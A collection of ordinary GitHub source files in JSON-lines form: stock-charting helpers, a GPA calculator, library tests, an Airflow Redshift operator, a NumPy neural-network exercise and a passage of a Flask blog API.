subplot_titles=(f\"{s_ticker}\", \"Volume\"),\n row_width=[0.2, 0.7],\n )\n fig.add_trace(\n go.Candlestick(\n x=df_stock.index,\n open=df_stock.Open,\n high=df_stock.High,\n low=df_stock.Low,\n close=df_stock.Close,\n name=\"OHLC\",\n ),\n row=1,\n col=1,\n )\n fig.add_trace(\n go.Scatter(\n x=df_stock.index,\n y=df_stock[\"ma20\"],\n name=\"MA20\",\n mode=\"lines\",\n line=go.scatter.Line(color=\"royalblue\"),\n ),\n row=1,\n col=1,\n )\n fig.add_trace(\n go.Scatter(\n x=df_stock.index,\n y=df_stock[\"ma50\"],\n name=\"MA50\",\n mode=\"lines\",\n line=go.scatter.Line(color=\"black\"),\n ),\n row=1,\n col=1,\n )\n\n if \"OC_High_trend\" in df_stock.columns:\n fig.add_trace(\n go.Scatter(\n x=df_stock.index,\n y=df_stock[\"OC_High_trend\"],\n name=\"High Trend\",\n mode=\"lines\",\n line=go.scatter.Line(color=\"green\"),\n ),\n row=1,\n col=1,\n )\n if \"OC_Low_trend\" in df_stock.columns:\n fig.add_trace(\n go.Scatter(\n x=df_stock.index,\n y=df_stock[\"OC_Low_trend\"],\n name=\"Low Trend\",\n mode=\"lines\",\n line=go.scatter.Line(color=\"red\"),\n ),\n row=1,\n col=1,\n )\n\n fig.add_trace(\n go.Bar(\n x=df_stock.index,\n y=df_stock.Volume,\n name=\"Volume\",\n marker_color=\"#696969\",\n ),\n row=2,\n col=1,\n )\n fig.update_layout(\n yaxis_title=\"Stock Price ($)\",\n xaxis=dict(\n rangeselector=dict(\n buttons=list(\n [\n dict(\n count=1,\n label=\"1m\",\n step=\"month\",\n stepmode=\"backward\",\n ),\n dict(\n count=3,\n label=\"3m\",\n step=\"month\",\n stepmode=\"backward\",\n ),\n dict(count=1, label=\"YTD\", step=\"year\", stepmode=\"todate\"),\n dict(\n count=1,\n label=\"1y\",\n step=\"year\",\n stepmode=\"backward\",\n ),\n dict(step=\"all\"),\n ]\n )\n ),\n rangeslider=dict(visible=False),\n type=\"date\",\n ),\n )\n if intraday:\n fig.update_xaxes(\n rangebreaks=[\n dict(bounds=[\"sat\", \"mon\"]),\n dict(bounds=[16, 9.5], pattern=\"hour\"),\n ]\n )\n\n fig.show()\n print(\"\")\n\n\ndef quote(other_args: List[str], s_ticker: str):\n \"\"\"Ticker quote\n\n Parameters\n ----------\n other_args : List[str]\n Argparse arguments\n s_ticker : str\n Ticker\n 
\"\"\"\n parser = argparse.ArgumentParser(\n add_help=False,\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n prog=\"quote\",\n description=\"Current quote for stock ticker\",\n )\n\n if s_ticker:\n parser.add_argument(\n \"-t\",\n \"--ticker\",\n action=\"store\",\n dest=\"s_ticker\",\n default=s_ticker,\n help=\"Stock ticker\",\n )\n else:\n parser.add_argument(\n \"-t\",\n \"--ticker\",\n action=\"store\",\n dest=\"s_ticker\",\n required=True,\n help=\"Stock ticker\",\n )\n\n # Price only option.\n parser.add_argument(\n \"-p\",\n \"--price\",\n action=\"store_true\",\n dest=\"price_only\",\n default=False,\n help=\"Price only\",\n )\n\n try:\n # For the case where a user uses: 'quote BB'\n if other_args and \"-\" not in other_args[0][0]:\n other_args.insert(0, \"-t\")\n ns_parser = parse_known_args_and_warn(parser, other_args)\n if not ns_parser:\n return\n\n except SystemExit:\n print(\"\")\n return\n\n ticker = yf.Ticker(ns_parser.s_ticker)\n\n # If price only option, return immediate market price for ticker.\n if ns_parser.price_only:\n print(f\"Price of {ns_parser.s_ticker} {ticker.info['regularMarketPrice']} \\n\")\n return\n\n try:\n quote_df = pd.DataFrame(\n [\n {\n \"Symbol\": ticker.info[\"symbol\"],\n \"Name\": ticker.info[\"shortName\"],\n \"Price\": ticker.info[\"regularMarketPrice\"],\n \"Open\": ticker.info[\"regularMarketOpen\"],\n \"High\": ticker.info[\"dayHigh\"],\n \"Low\": ticker.info[\"dayLow\"],\n \"Previous Close\": ticker.info[\"previousClose\"],\n \"Volume\": ticker.info[\"volume\"],\n \"52 Week High\": ticker.info[\"fiftyTwoWeekHigh\"],\n \"52 Week Low\": ticker.info[\"fiftyTwoWeekLow\"],\n }\n ]\n )\n\n quote_df[\"Change\"] = quote_df[\"Price\"] - quote_df[\"Previous Close\"]\n quote_df[\"Change %\"] = quote_df.apply(\n lambda x: f'{((x[\"Change\"] / x[\"Previous Close\"]) * 100):.2f}%',\n axis=\"columns\",\n )\n for c in [\n \"Price\",\n \"Open\",\n \"High\",\n \"Low\",\n \"Previous Close\",\n \"52 Week High\",\n \"52 Week Low\",\n \"Change\",\n ]:\n quote_df[c] = quote_df[c].apply(lambda x: f\"{x:.2f}\")\n quote_df[\"Volume\"] = quote_df[\"Volume\"].apply(lambda x: f\"{x:,}\")\n\n quote_df = quote_df.set_index(\"Symbol\")\n\n quote_data = transpose(quote_df)\n\n print(\n tabulate(\n quote_data,\n headers=quote_data.columns, # type: ignore\n tablefmt=\"fancy_grid\",\n stralign=\"right\",\n )\n )\n\n except KeyError:\n print(f\"Invalid stock ticker: {ns_parser.s_ticker}\")\n\n print(\"\")\n return\n\n\ndef load_ticker(\n ticker: str, start_date: Union[str, datetime], end_date: Union[str, datetime] = \"\"\n) -> pd.DataFrame:\n \"\"\"Loads a ticker data from Yahoo Finance, adds a data index column data_id and Open-Close High/Low columns.\n\n Parameters\n ----------\n ticker : str\n The stock ticker.\n start_date : Union[str,datetime]\n Start date to load stock ticker data formatted YYYY-MM-DD.\n end_date : Union[str,datetime]\n End date to load stock ticker data formatted YYYY-MM-DD.\n\n Returns\n -------\n DataFrame\n A Panda's data frame with columns Open, High, Low, Close, Adj Close, Volume, date_id, OC-High, OC-Low.\n \"\"\"\n if end_date:\n df_data = yf.download(ticker, start=start_date, end=end_date, progress=False)\n else:\n df_data = yf.download(ticker, start=start_date, progress=False)\n\n df_data[\"date_id\"] = (df_data.index.date - df_data.index.date.min()).astype(\n \"timedelta64[D]\"\n )\n df_data[\"date_id\"] = df_data[\"date_id\"].dt.days + 1\n\n df_data[\"OC_High\"] = df_data[[\"Open\", \"Close\"]].max(axis=1)\n df_data[\"OC_Low\"] = 
df_data[[\"Open\", \"Close\"]].min(axis=1)\n\n return df_data\n\n\ndef process_candle(df_data: pd.DataFrame) -> pd.DataFrame:\n \"\"\"Process DataFrame into candle style plot\n\n Parameters\n ----------\n df_data : DataFrame\n Stock dataframe.\n\n Returns\n -------\n DataFrame\n A Panda's data frame with columns Open, High, Low, Close, Adj Close, Volume, date_id, OC-High, OC-Low.\n \"\"\"\n df_data[\"date_id\"] = (df_data.index.date - df_data.index.date.min()).astype(\n \"timedelta64[D]\"\n )\n df_data[\"date_id\"] = df_data[\"date_id\"].dt.days + 1\n\n df_data[\"OC_High\"] = df_data[[\"Open\", \"Close\"]].max(axis=1)\n df_data[\"OC_Low\"] = df_data[[\"Open\", \"Close\"]].min(axis=1)\n\n df_data[\"ma20\"] = df_data[\"Close\"].rolling(20).mean().fillna(method=\"bfill\")\n df_data[\"ma50\"] = df_data[\"Close\"].rolling(50).mean().fillna(method=\"bfill\")\n\n return df_data\n\n\ndef find_trendline(\n df_data: pd.DataFrame, y_key: str, high_low: str = \"high\"\n) -> pd.DataFrame:\n \"\"\"Attempts to find a trend line based on y_key column from a given stock ticker data frame.\n\n Parameters\n ----------\n df_data : DataFrame\n The stock ticker data frame with at least date_id, y_key columns.\n\n y_key : str\n Column name to base the trend line on.\n\n high_low: str, optional\n Either \"high\" or \"low\". High is the default.\n\n Returns\n -------\n DataFrame\n If a trend is successfully found,\n An updated Panda's data frame with a trend data {y_key}_trend column.\n If no trend was found,\n An original Panda's data frame\n \"\"\"\n\n for iteration in [3, 4, 5, 6, 7]:\n df_temp = df_data.copy()\n while len(df_temp) > iteration:\n reg = stats.linregress(\n x=df_temp[\"date_id\"],\n y=df_temp[y_key],\n )\n\n if high_low == \"high\":\n df_temp = df_temp.loc[\n df_temp[y_key] > reg[0] * df_temp[\"date_id\"] + reg[1]\n ]\n else:\n df_temp = df_temp.loc[\n df_temp[y_key] < reg[0] * df_temp[\"date_id\"] + reg[1]\n ]\n\n if len(df_temp) > 1:\n break\n\n if len(df_temp) == 1:\n return df_data\n\n reg = stats.linregress(\n x=df_temp[\"date_id\"],\n y=df_temp[y_key],\n )\n\n df_data[f\"{y_key}_trend\"] = reg[0] * df_data[\"date_id\"] + reg[1]\n\n return df_data\n","repo_name":"DidierRLopes/GST-discordbot","sub_path":"gamestonk_terminal/stocks/stocks_helper.py","file_name":"stocks_helper.py","file_ext":"py","file_size_in_byte":20844,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"31513981621","text":"print('Selamat datang di Kalkulator IPK!')\n\n# Menggunakan while loop untuk mengecek apakah jumlah matkul yang diinput sesuai kriteria\n# Apabila kurang dari 0 , maka user harus menginput nilai kembali yang valid\n# Jika matkul nya 0 , maka tidak ada matkul yg diambil dan program langsung berhenti\n# Selebihnya bila > 0 , maka loop berhenti dan lanjut ke statement berikutnya\nwhile True:\n # Menerima input user untuk jumlah matkul\n jumlah_matkul=int(input('Masukkan jumlah mata kuliah: '))\n if jumlah_matkul==0:\n print('Tidak ada mata kuliah yang diambil.')\n exit()\n elif jumlah_matkul<0:\n continue\n else:\n break\n\n# Assign variabel yang akan kita butuhkan untuk perhitungan nanti \njumlah_semua_mutu=0\njumlah_mutu_lulus=0\nsks_lulus=0\nsks_tidak_lulus=0\n\n# Menggunakan for loop sebanyak jumlah matkul yang diambil\nfor loop in range(jumlah_matkul):\n\n # Menerima input user berupa nama matkul dengan formatting untuk menentukan jumlah matkul ke berapa\n # Dan juga menerima input berupa jumlah sks dengan formatting nama matkulnya apa\n 
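# --- Editor's note: hedged sketch of the intended call order for the helpers
# above. The ticker and date are illustrative, and yfinance needs network
# access; the *_trend columns only appear when a trend line was actually found.
df = load_ticker("AAPL", "2021-01-01")
df = find_trendline(df, "OC_High", "high")
df = find_trendline(df, "OC_Low", "low")
print(df.filter(["Close", "OC_High_trend", "OC_Low_trend"]).tail())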
nama_matkul=input(f'Masukkan nama mata kuliah ke-{loop+1}: ')\n jumlah_sks=int(input(f'Masukkan jumlah SKS {nama_matkul} : '))\n\n # Menggunakan loop untuk mengecek nilai matkul , kalau kurang dari 0 nilainya tetap di-looping\n # Dan selain itu break dari loop\n while True:\n # Input nilai_matkul dalam bentuk float karena memungkinkan inputan ada koma\n nilai_matkul=float(input('Masukkan nilai yang kamu dapatkan: '))\n if nilai_matkul<0:\n print('Nilai yang kamu masukkan tidak valid')\n continue\n else : \n break\n \n # Menggunakan condition untuk mengonversi nilai matkul menjadi bobot dan\n # Menentukan jumlah sks matkul yang lulus atau tidak sesuai dengan kriteria yang sudah ditentukan\n if 0<=nilai_matkul<40:\n bobot=0.00\n sks_tidak_lulus+=jumlah_sks\n elif 40<=nilai_matkul<55:\n bobot=1.00\n sks_tidak_lulus+=jumlah_sks\n else:\n # Memakai nested condition khusus untuk nilai matkul yang membuat lulus sks ,\n # Supaya bisa menspesifikan mutu hanya untuk jumlah mutu matkul yang lulus\n if 55<=nilai_matkul<60:\n bobot=2.00\n sks_lulus+=jumlah_sks\n elif 60<=nilai_matkul<65:\n bobot=2.30\n sks_lulus+=jumlah_sks\n elif 65<=nilai_matkul<70:\n bobot=2.70\n sks_lulus+=jumlah_sks\n elif 70<=nilai_matkul<75:\n bobot=3.00\n sks_lulus+=jumlah_sks\n elif 75<=nilai_matkul<80:\n bobot=3.30\n sks_lulus+=jumlah_sks\n elif 80<=nilai_matkul<85:\n bobot=3.70\n sks_lulus+=jumlah_sks\n elif nilai_matkul>=85:\n bobot=4.00\n sks_lulus+=jumlah_sks\n # Menjumlahkan total mutu sks yang lulus\n jumlah_mutu_lulus+=bobot*jumlah_sks\n \n # Menjumlahkan total mutu sks yang lulus maupun yang tidak lulus\n mutu=bobot*jumlah_sks\n jumlah_semua_mutu+=mutu\n print()\n\n# Ketika Loop Selesai\n# Menjumlahkan total sks yang diambil dari yg lulus + tidak lulus\ntotal_sks=sks_lulus+sks_tidak_lulus\n\n# Membuat condition jika total semua sks atau total sks lulus tidak 0 \n# Maka dicari IPT atau IPK menggunakan rumus yang ditentukan\n# Tetapi jika 0 , maka IPT atau IPK tetap 0 , dan tidak dimasukkan ke rumus\n# Untuk menghindari terjadinya division by zero error\nIPT,IPK=0,0\nif total_sks!=0:\n IPT=jumlah_semua_mutu/total_sks\nif sks_lulus!=0:\n IPK=jumlah_mutu_lulus/sks_lulus\n\n# Print dengan formatting dan juga kata kata yang telah ditentukan\nprint('Jumlah SKS lulus :' ,sks_lulus ,'/', total_sks)\nprint('Jumlah mutu lulus:', f'{jumlah_mutu_lulus:.2f}' ,'/', f'{jumlah_semua_mutu:.2f}')\nprint('Total IPK kamu adalah' ,f'{IPK:.2f}')\nprint('Total IPT kamu adalah', f'{IPT:.2f}')\n\n","repo_name":"bryan273/DDP1_2021","sub_path":"Lab02 - GPA Calculation/kalkulator_ipk.py","file_name":"kalkulator_ipk.py","file_ext":"py","file_size_in_byte":3867,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"70521742974","text":"#!/usr/bin/env python3\n\n# -- run_menu_update.py --\n# This script fetches new menu data from the sources specified in the configuration.\n# It downloads menus to the files configured in the section 'menu_locations' of the\n# config file.\n# Usage: `python run_menu_update.py [config_file]`\n# \n\nimport sys\nimport json\nfrom menu import menudownload\n\n# use 'config.json' as default config file\nif len(sys.argv) > 1:\n config_file = sys.argv[1]\nelse:\n config_file = \"config.json\"\nwith open(config_file, 'r') as f:\n config = json.load(f)\n\n# download menus\nsources = config.get(\"menu_sources\")\nfor location, file in config.get(\"menu_locations\").items():\n menudownload.download_to_file(file, location, 
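# --- Editor's note: sketch of the config.json shape that run_menu_update.py
# above expects -- a "menu_sources" entry plus a "menu_locations" mapping of
# location name to output file. The key names come from the script; the values
# and the exact shape of "menu_sources" are guesses.
#
#   {
#     "menu_sources": {"mensa-main": "https://example.org/menu-api"},
#     "menu_locations": {"mensa-main": "menus/mensa-main.json"}
#   }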
sources)\n","repo_name":"calpt/telegram-bots","sub_path":"tu_mensabot/run_menu_update.py","file_name":"run_menu_update.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"19282823309","text":"import pytest\n\nfrom handpick import pick, Predicate\n\n\nclass TestCollectionHandling:\n def test_collections_included_by_default(self, sample_sequences):\n picked = list(pick(sample_sequences))\n assert picked == [\n [[\"ab\"], b\"cd\", (b\"ef\",)],\n [\"ab\"],\n \"ab\",\n b\"cd\",\n (b\"ef\",),\n b\"ef\",\n (\"3.14\", \"15\"),\n \"3.14\",\n \"15\",\n ]\n\n def test_collections_excluded_optionally(self, sample_sequences):\n picked = list(pick(sample_sequences, collections=False))\n assert picked == [\"ab\", b\"cd\", b\"ef\", \"3.14\", \"15\"]\n\n def test_collections_in_dict_keys_included_by_default(self, sample_subscriptables):\n picked = list(pick(sample_subscriptables, dict_keys=True))\n assert picked == [\n [[\"ab\"], b\"cd\", {(\"ef\",): b\"gh\"}],\n [\"ab\"],\n \"ab\",\n b\"cd\",\n {(\"ef\",): b\"gh\"},\n (\"ef\",),\n \"ef\",\n b\"gh\",\n {\"ij\": \"kl\"},\n \"ij\",\n \"kl\",\n (\"3.14\", \"15\"),\n \"3.14\",\n \"15\",\n ]\n\n def test_collections_in_dict_keys_excluded_optionally(self, sample_subscriptables):\n picked = list(pick(sample_subscriptables, collections=False, dict_keys=True))\n assert picked == [\"ab\", b\"cd\", \"ef\", b\"gh\", \"ij\", \"kl\", \"3.14\", \"15\"]\n\n\nclass TestFunctionsAndPredicates:\n def test_simple_function(self, sample_collections):\n picked = list(pick(sample_collections, lambda s: hasattr(s, \"count\")))\n assert picked == [\n [{\"ab\"}, b\"cd\", {(\"ef\",): b\"gh\"}],\n \"ab\",\n b\"cd\",\n b\"gh\",\n (frozenset({\"3.14\"}), \"15\"),\n \"3.14\",\n \"15\",\n ]\n\n def test_function_raises_error(self, sample_collections):\n with pytest.raises(TypeError):\n list(pick(sample_collections, lambda s: s[1]))\n\n def test_predicate_suppresses_errors(self, sample_collections):\n picked = list(pick(sample_collections, Predicate(lambda s: s[1])))\n assert picked == [\n [{\"ab\"}, b\"cd\", {(\"ef\",): b\"gh\"}],\n \"ab\",\n b\"cd\",\n b\"gh\",\n (frozenset({\"3.14\"}), \"15\"),\n \"3.14\",\n \"15\",\n ]\n\n\nclass TestDictKeyHandling:\n def test_dict_keys_excluded_by_default(self, sample_subscriptables):\n picked = list(pick(sample_subscriptables, lambda t: isinstance(t, tuple)))\n assert picked == [(\"3.14\", \"15\")]\n\n def test_dict_keys_included_optionally(self, sample_subscriptables):\n picked = list(\n pick(sample_subscriptables, lambda t: isinstance(t, tuple), dict_keys=True)\n )\n assert picked == [(\"ef\",), (\"3.14\", \"15\")]\n\n\nclass TestSpecialCases:\n def test_empty_root_yields_nothing(self):\n assert list(pick([])) == []\n\n def test_non_iterable_root_yields_nothing(self):\n assert list(pick(None)) == []\n\n def test_non_callable_predicate_raises_error(self, sample_collections):\n with pytest.raises(TypeError, match=\"predicate must be callable\"):\n list(pick(sample_collections, 42))\n\n def test_omitted_predicate_yields_everything(self):\n assert list(pick([{1: 2}])) == [{1: 2}, 2]\n assert list(pick([{1: 2}], collections=False)) == [2]\n assert list(pick([{1: 2}], dict_keys=True)) == [{1: 2}, 1, 2]\n\n def test_custom_sequence(self, custom_sequence):\n assert list(pick(custom_sequence, bool)) == [1, 2]\n\n def test_custom_sequence_no_predicate(self, custom_sequence):\n assert list(pick(custom_sequence)) == [0, 1, 2]\n\n\nclass 
TestStringsAndBytesLike:\n @pytest.mark.parametrize(\n \"data, expected\",\n (\n pytest.param([\"foo\"], [\"foo\"], id=\"string\"),\n pytest.param([\"ab\", [\"cd\"]], [\"ab\", [\"cd\"], \"cd\"], id=\"nested\"),\n pytest.param(\"foo\", [], id=\"top-level string\"),\n ),\n )\n def test_strings_not_iterated(self, data, expected):\n assert list(pick(data)) == expected\n\n @pytest.mark.parametrize(\n \"data, expected\",\n (\n pytest.param([b\"foo\"], [b\"foo\"], id=\"bytes\"),\n pytest.param([b\"ab\", [b\"cd\"]], [b\"ab\", [b\"cd\"], b\"cd\"], id=\"nested\"),\n pytest.param(b\"foo\", [], id=\"top-level bytes\"),\n ),\n )\n def test_bytes_like_not_iterated_by_default(self, data, expected):\n assert list(pick(data)) == expected\n\n @pytest.mark.parametrize(\n \"data, expected\",\n (\n pytest.param([b\"foo\"], [b\"foo\", ord(\"f\"), ord(\"o\"), ord(\"o\")], id=\"bytes\"),\n pytest.param(\n [b\"ab\", [b\"cd\"]],\n [b\"ab\", ord(\"a\"), ord(\"b\"), [b\"cd\"], b\"cd\", ord(\"c\"), ord(\"d\")],\n id=\"nested\",\n ),\n pytest.param(bytearray([4, 2]), [4, 2], id=\"top-level bytes\"),\n ),\n )\n def test_bytes_like_iterated_optionally(self, data, expected):\n assert list(pick(data, bytes_like=True)) == expected\n\n def test_bytes_like_not_picked_but_iterated_optionally(self):\n data = [\"foo\", 42, b\"bar\"]\n picked = list(pick(data, collections=False, bytes_like=True))\n assert picked == [\"foo\", 42, ord(\"b\"), ord(\"a\"), ord(\"r\")]\n","repo_name":"mportesdev/handpick","sub_path":"tests/test_pick.py","file_name":"test_pick.py","file_ext":"py","file_size_in_byte":5273,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"18889919294","text":"def solution (a, b, queries):\n\tprint(f'a = {a}, b = {b}, queries = {queries}\\n')\n\n\tres = []\n\n\tfor query in queries:\n\t\tprint(f'query = {query}', end='\\t')\n\t\tif query[0] == 0:\n\t\t\ta[query[1]] = query[2]\n\t\t\tprint(f'handled 0: a = {a}, b = {b}')\n\t\telif query[0] == 1:\n\t\t\tcomplements = [query[1] - n for n in a]\n\t\t\tmatches = [b.count(c) for c in complements]\n\t\t\tres += [sum(matches)]\n\t\t\tprint(f'\\thandled 1: res = {res}')\n\n\tprint('')\n\treturn(res)\n\n\nif __name__ == '__main__':\n\tprint('')\n\ta = [3,4]\n\tb = [1,2,3]\n\tqueries = [[1,5], [0,0,1], [1,5]]\n\tprint(f\"solution() = {solution(a, b, queries)}\\n\")\n\n\tprint('')\n\ta = [2,3]\n\tb = [1,2,2]\n\tqueries = [[1,4], [0,0,3], [1,5]]\n\tprint(f\"solution() = {solution(a, b, queries)}\\n\")\n\n","repo_name":"arulkumar-c/learn","sub_path":"python/array-queries.py","file_name":"array-queries.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"15860449360","text":"from airflow.hooks.postgres_hook import PostgresHook\nfrom airflow.models import BaseOperator\nfrom airflow.utils.decorators import apply_defaults\n\nclass LoadDimensionOperator(BaseOperator):\n\n ui_color = '#80BD9E'\n\n @apply_defaults\n def __init__(self,\n redshift_conn_id='',\n table='',\n sql='',\n *args, **kwargs):\n \"\"\"\n Initialize Redshift, dimension table, and SQL insert statement\n \n Keyword Arguments:\n redshift_conn_id -- Redshift connection ID configured in Airflow/admin/connection UI (str)\n table -- Dimension table name (str)\n sql -- SQL insert command to execute on dimension table (str)\n \"\"\"\n super(LoadDimensionOperator, self).__init__(*args, **kwargs)\n self.redshift_conn_id = redshift_conn_id\n self.table = table\n self.sql = 
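# --- Editor's note: a one-example summary of the behaviour the tests above pin
# down. pick() walks nested containers and yields values matching the
# predicate; a Predicate-wrapped callable treats per-item errors as False.
from handpick import pick, Predicate

data = [1, [2, {"a": 3}], "skip"]
assert list(pick(data, lambda x: isinstance(x, int))) == [1, 2, 3]
# `x % 2` raises TypeError for the containers and the string; Predicate
# suppresses those errors, so only the odd numbers are picked.
assert list(pick(data, Predicate(lambda x: x % 2))) == [1, 3]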
sql\n\n    def execute(self, context, delete_existing_data=False):\n        \"\"\"\n        Loads data from staging table(s) to dimension table\n        \n        Keyword Arguments:\n        delete_existing_data -- Deletes existing data from table if True (bool)\n        \"\"\"\n        redshift = PostgresHook(self.redshift_conn_id)\n\n        # Deletes existing data from table if True\n        if delete_existing_data:\n            self.log.info(f'Deleting data in {self.table} table')\n            redshift.run(f'DELETE FROM {self.table}')\n        else:\n            self.log.info(f'Loading data from staging table(s) to {self.table} table')\n\n        self.log.info(f'LoadDimensionOperator loading {self.table} table')\n        redshift.run(self.sql)\n        self.log.info(f'LoadDimensionOperator loaded {self.table} table')\n        \n        \n","repo_name":"marshall7m/sparkify-aws-airflow","sub_path":"plugins/operators/load_dimension.py","file_name":"load_dimension.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"33963947448","text":"\n\n# -*- coding: utf-8 -*-\n\"\"\"\nHands-on practice with neural-net layers.\n\nA version that takes backpropagation into account. \n\"\"\"\n\nimport numpy as np \n\n\nclass Sigmoid:\n    def __init__(self):\n        self.params = [] \n        self.grads = []\n        self.out = None \n    \n    def forward(self, x):\n        out = 1 / (1 + np.exp(-x))\n        self.out = out \n        return out\n    \n    def backward(self, dout):\n        return dout * (1.0 - self.out) * self.out\n    \n    \n\nclass Affine: \n    def __init__(self, W,b):\n        self.params = [W,b]\n        self.grads = [np.zeros_like(W), np.zeros_like(b)]\n        self.x = None \n    \n    def forward(self, x):\n        W, b = self.params \n        out = np.matmul(x,W) + b\n        self.x = x\n        return out \n    def backward(self, dout):\n        W, b = self.params\n        dx = np.matmul(dout, W.T)\n        dW = np.matmul(self.x.T, dout)\n        db = np.sum(dout, axis=0)\n        \n        self.grads[0][...] = dW \n        self.grads[1][...] = db\n        return dx\n    \n\n\n\n\n\n# The training process: \n# compute the gradients, then update the weights: SGD, [Momentum, AdaGrad, Adam, etc.]\n# Error backpropagation yields the gradient that points toward the largest loss; \n# updating in the opposite direction of the gradient reduces the error.\n\n\nclass SGD: \n    def __init__(self, lr=0.01):\n        self.lr = lr \n    \n    \n    def update(self, params, grads):\n        for i in range(len(params)):\n            params[i] -= self.lr * grads[i]\n    \n\n\n'''\n\n\nx = np.random.randn(10,2)\n\n\nw1 = np.random.randn(2,4)\nb1 = np.random.randn(4)\n\n\nw2 = np.random.randn(4,3)\nb2 = np.random.randn(3)\n\n\nL1 = Affine(w1,b1)\nL2 = Sigmoid()\nL3 = Affine(w2,b2)\n\n\ny = L1.forward(x)\nz = L2.forward(y)\no = L3.forward(z)\n\n\n\n'''\n\n# Building the process above more concisely -> bundle all the layers used into a single class \n\nclass TwoLayerNet:\n    def __init__(self, input_size, hidden_size, output_size):\n        i, h, o = input_size, hidden_size, output_size\n        \n        W1 = np.random.randn(i,h)\n        b1 = np.random.randn(h)\n        W2 = np.random.randn(h,o)\n        b2 = np.random.randn(o)\n        \n\n        self.layers = [Affine(W1,b1), Sigmoid(), Affine(W2,b2)]\n        \n        self.params = []\n        for layer in self.layers:\n            self.params += layer.params # a = [1,2]; a += [3,4] -> a == [1,2,3,4]\n        \n        \n    def predict(self, x):\n        for layer in self.layers:\n            x = layer.forward(x)\n        return x \n    \n\n    \nx = np.random.randn(10,2)\nnet = TwoLayerNet(2,4,3)\n\no = net.predict(x)\n","repo_name":"purang2/deepLearning-practice","sub_path":"밑바닥 2/ch1. NeuralNetwork/3. NN with Error-Backprop.py","file_name":"3. NN with Error-Backprop.py","file_ext":"py","file_size_in_byte":2584,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"15557646657","text":"from flask import jsonify, current_app, request, g\nfrom flask_login import login_required\nfrom . 
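# --- Editor's note: hedged sketch of using the LoadDimensionOperator above
# inside a DAG. The dag id, task id, connection id and INSERT statement are
# illustrative, not taken from this repository.
from datetime import datetime
from airflow import DAG

with DAG("sparkify_etl", start_date=datetime(2021, 1, 1), schedule_interval="@daily") as dag:
    load_users = LoadDimensionOperator(
        task_id="load_users_dim",
        redshift_conn_id="redshift",
        table="users",
        sql="INSERT INTO users SELECT DISTINCT userid, firstname, lastname FROM staging_events",
    )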
import api\nfrom ..models import *\nfrom ..utils import *\nfrom .. import *\n\n\"\"\"\napi routes:\n    get_posts(): return all blog posts\n    get_post(id): return the post with the given id\n    get_pages(): return all pages\n    get_page(id): return the page with the given id\n    get_tags(): return all blog tags\n    get_tag_posts(tag): return the posts with the given tag\n    get_categories(): return all blog categories\n    get_category_posts(cate): return the posts in the given category\n    get_shuos(): return all shuoshuo (status updates)\n\"\"\"\n\n\n@api.route('/posts')\n@cache.cached(60*60*24,query_string=True)\ndef get_posts():\n    page = request.args.get('page', 1, type=int)\n    pagination = Post.query.filter_by(draft=False)\\\n        .order_by(Post.timestamp.desc()).paginate(\n        page, per_page=current_app.config['POSTS_PER_PAGE'],\n        error_out=False)\n    posts = pagination.items\n    prev = None\n    if pagination.has_prev:\n        prev = url_for('api.get_posts', page=page - 1, _external=True)\n    next = None\n    if pagination.has_next:\n        next = url_for('api.get_posts', page=page + 1, _external=True)\n\n    return jsonify({\n        'posts': [post.to_json() for post in posts],\n        'prev': prev,\n        'next': next,\n        'count': pagination.total\n    })\n\n\n@api.route('/post/<int:id>')\n@cache.cached(60*60*24,query_string=True)\ndef get_post(id):\n    post = Post.query.filter_by(id=id).first()\n    if post:\n        return jsonify({\n            'post': post.to_json(),\n            'body': post.body.split('<!--more-->')[0],\n            'html': post.body_to_html.split('<!--more-->')[0]\n        })\n\n    return jsonify({'msg': 'No information...'})\n\n\n# POST request\n@api.route('/post', methods=['POST'])\n@login_required\n@admin_required\ndef new_post():\n    post = Post.from_json(request.json)\n    db.session.add(post)\n    db.session.commit()\n    return jsonify(post.to_json()), 201, {'Location': url_for('api.get_post', id=post.id, _external=True)}\n\n\n# PUT request\n@api.route('/posts/<int:id>', methods=['PUT'])\n@login_required\n@admin_required\ndef edit_post(id):\n    post = Post.query.get_or_404(id)\n\n    post.title = request.json.get('title', post.title)\n    post.body = request.json.get('body', post.body)\n    db.session.add(post)\n    return jsonify(post.to_json())\n\n\n@api.route('/pages')\n@cache.cached(60*60*24,query_string=True)\ndef get_pages():\n    pages = Page.query.order_by(Page.id.desc()).all()\n    return jsonify({\n        'pages': [page.to_json() for page in pages],\n        'count': len(pages)\n    })\n\n\n@api.route('/page/<int:id>')\n@cache.cached(60*60*24,query_string=True)\ndef get_page(id):\n    page = Page.query.get_or_404(id)\n    if page:\n        return jsonify({\n            'page': page.to_json(),\n            'body': page.body,\n            'html': page.body_to_html\n        })\n\n    return jsonify({'msg': 'No information...'})\n\n\n@api.route('/tags')\n@cache.cached(60*60*24,query_string=True)\ndef get_tags():\n    tags = Tag.query.all()\n\n    return jsonify({\n        'tags': [tag.to_json() for tag in tags],\n        'count': len(tags)\n    })\n\n\n@api.route('/tag/<tag>')\n@cache.cached(60*60*24,query_string=True)\ndef get_tag_posts(tag):\n    tag = Tag.query.filter_by(tag=tag).first()\n    if tag:\n        posts = [p for p in Post.query.filter_by(draft=False).all() if p.tag_in_post(tag.tag)]\n        return jsonify({\n            'posts': [post.to_json() for post in posts],\n            'count': len(posts)\n        })\n\n    return jsonify({'msg': 'No information...'})\n\n\n@api.route('/categories')\n@cache.cached(60*60*24,query_string=True)\ndef get_categories():\n    categories = Category.query.all()\n\n    return jsonify({\n        'categories': [category.to_json() for category in categories],\n        'count': len(categories)\n    })\n\n\n@api.route('/category/<category>')\n@cache.cached(60*60*24,query_string=True)\ndef get_category_posts(category):\n    category = Category.query.filter_by(category=category).first()\n    if category:\n        posts = 